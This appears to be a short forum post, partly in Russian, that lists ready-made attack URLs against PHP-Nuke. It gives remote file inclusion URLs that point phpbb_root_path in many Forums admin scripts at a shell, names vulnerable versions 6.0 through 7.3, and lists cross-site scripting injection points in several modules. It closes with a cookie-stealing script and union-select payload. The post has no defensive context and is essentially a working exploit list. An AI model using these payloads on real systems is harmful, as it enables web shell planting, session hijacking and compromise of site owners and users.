Инклуды: Code: http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell? http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=shell?
XSS Версии: Code: PHP-Nuke 7.3 PHP-Nuke 7.2 PHP-Nuke 7.1 PHP-Nuke 7.0 FINAL PHP-Nuke 7.0 PHP-Nuke 6.9 PHP-Nuke 6.7 PHP-Nuke 6.6 PHP-Nuke 6.5 RC3 PHP-Nuke 6.5 RC2 PHP-Nuke 6.5 RC1 PHP-Nuke 6.5 FINAL PHP-Nuke 6.5 BETA 1 PHP-Nuke 6.5 PHP-Nuke 6.0 Code: http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here] http://www.example.com/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss code here] http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=[xss code here]&month=05&month_l=May http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss code here]&month_l=May http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss code here] http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss code here]&order=0&thold=0 http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0 http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss code here] http://www.example.com/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
